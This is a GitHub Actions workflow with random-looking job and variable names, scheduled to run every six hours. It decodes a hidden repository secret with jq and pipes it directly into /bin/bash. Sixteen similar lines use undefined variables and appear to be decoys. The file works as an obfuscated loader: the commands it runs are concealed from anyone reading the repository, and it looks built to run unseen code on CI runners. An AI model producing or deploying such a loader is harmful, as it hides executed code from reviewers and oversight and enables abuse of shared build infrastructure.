name: caochenxi8710
on:
  workflow_dispatch:
  schedule:
    - cron: '1 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caochenxi8710
        env:
          rizxu2: ${{ secrets.rizxu2 }}
        run: |
          echo $rizxu2 | jq -r .nidwi38388 | /bin/bash
          echo $t6973 | jq -r .z4 | /bin/bash
          echo $x66 | jq -r .phzpb5 | /bin/bash
          echo $yy62323 | jq -r .vx4879 | /bin/bash
          echo $gqbe223 | jq -r .jf17 | /bin/bash
          echo $suv1094 | jq -r .uj3535 | /bin/bash
          echo $ktyfy6166 | jq -r .c23 | /bin/bash
          echo $fr3831 | jq -r .vzd93 | /bin/bash
          echo $sy24 | jq -r .dka966 | /bin/bash
          echo $jhqt1 | jq -r .vlui26427 | /bin/bash
          echo $j09 | jq -r .a0646 | /bin/bash
          echo $r6823 | jq -r .ikys26947 | /bin/bash
          echo $wvt9565 | jq -r .pv6 | /bin/bash
          echo $knxdm61 | jq -r .tbgx974 | /bin/bash
          echo $zamx2286 | jq -r .bxhu1 | /bin/bash
          echo $emjcj2 | jq -r .cltq2 | /bin/bash
          echo $g391 | jq -r .qtm063 | /bin/bash

